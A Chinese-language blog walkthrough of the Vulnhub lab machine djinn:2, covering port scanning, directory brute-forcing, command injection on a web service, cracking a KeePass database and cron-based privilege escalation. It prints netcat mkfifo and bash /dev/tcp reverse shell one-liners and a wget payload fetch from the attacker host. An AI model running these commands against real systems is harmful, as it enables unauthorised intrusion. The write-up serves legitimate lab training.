Vulnhub:djinn: 2

一、前言

通过大量vulnhub受控靶机积累一线攻防经验和技巧。

二、环境

靶机名称:djinn:2

靶机难度:中级

目标:有1个flag——/root/proof.sh

攻击机:kali linux,IP地址192.168.100.9

靶机:os-bytesec,IP地址192.168.101.199

三、挑战过程

图一

1.扫描IP提供的IT服务(ps-之前IP是198,现在变成199了,我就不重复截图了)——

nmap -v -A -sV -T4 -p 1-65535 192.168.101.199

图二
图三

2.web目录爆破(ps-之前IP是198,现在变成199了,我就不重复截图了)——

gobuster dir -u http://192.168.101.199:7331/ -w /usr/share/wordlists/dirb/big.txt

图四

3.web应用探索(ps-之前IP是198,现在变成199了,我就不重复截图了)

图五
图六

4.继续爆破(ps-之前IP是198,现在变成199了,我就不重复截图了)——

图七

遗憾没有任何新发现。

5.根据source里提及的信息,尝试5000端口的IT服务(ps-之前IP是198,现在变成199了,我就不重复截图了)

图八

这里提到请求方法错误,尝试诸如POST的其他http请求方法,果然!

图九

访问拒绝,试试有没命令注入或者sql注入

sqlmap -u "http://192.168.101.198:5000" --data "7846A$56" --level 3

图十
图十一

有意思的是,当我们使用curl进行post请求,可以发现有命令注入!!!(疑问点,我不知道这是什么逻辑)

图十二

6.构造并监听反弹shell(ps-之前IP是198,现在变成199了,我就不重复截图了)

msf监听

图十三

构造反弹shell并启动http服务供下载

wget+-P+/tmp/+http://192.168.100.9:8000/b.sh(下载到指定目录)

图十四
图十五
图十六
图十七
图十八

我不知道为什么我这里弹不了反弹shell,明明是200

图十九

只能参考别人的提权思路,曲线提权了

更新-解决了,用了脚本hex转码绕过

mkfifo /tmp/foo;cat /tmp/foo | /bin/bash -i 2>&1 | nc 192.168.100.9 4444 >/tmp/foo

更新图
更新图

7.提权——

在/var/backups目录下发现一个nitu.kdbx文件,我这里用xxd实现16进制编码copy保障文件完整性,在本地再转码回来,然后用keepass2打开。

什么是KDBX文件? 由Windows免费密码管理器KeePass Password Safe创建的文件; 存储密码的加密数据库,该数据库只能使用用户设置的主密码进行查看; 用于安全存储Windows,电子邮件帐户,FTP站点,电子商务站点和其他目的的个人登录凭据。 KDBX格式是KeePass的2版本引入的。

图二十
图二十一

获取密码-&HtMGd$LJB

图二十二

尝试ssh登录nitish用户

图二十三
图二十四

探索服务器上提供的IT服务-2843

图二十五

尝试命令注入,发现是用户ugtan

接着就是反弹shell,不能直接使用bash反弹,使用revshellgen生成payload,成功反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.100.9 4444 > /tmp/f

图二十六
图二十七
图二十八

在/var/mail目录下有一封邮件,说是在ugtan的家目录下创建了文件夹,会有一个定时任务运行clean.sh,我们借此制造一个反弹shell。

echo "bash -i >& /dev/tcp/192.168.100.9/5555 0>&1" > clean.sh

图二十九
图三十

四、总结

风险点:

1.web服务存在命令注入

2.服务器写的一个脚本服务(2843)存在命令注入

3.自动计划root权限运行

4.nitu.kdbx和/var/mail/ugtan存在敏感信息暴露在服务器上

五、疑问点

1.【high】反弹shell执行不了-web的命令注入-更新,使用脚本hex转码解决了

2.【high】现阶段对提权风险模糊且不成体系


参考链接

1.【思路】https://blog.csdn.net/weixin_43784056/article/details/107008701?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&utm_relevant_index=1

2.【脚本编码tips】http://andreaukk.altervista.org/djinn-2-writeup-vulnhub/?doing_wp_cron=1641955561.6923429965972900390625

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,634评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,951评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,427评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,770评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,835评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,799评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,768评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,544评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,979评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,271评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,427评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,121评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,756评论 3 324
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,375评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,579评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,410评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,315评论 2 352

推荐阅读更多精彩内容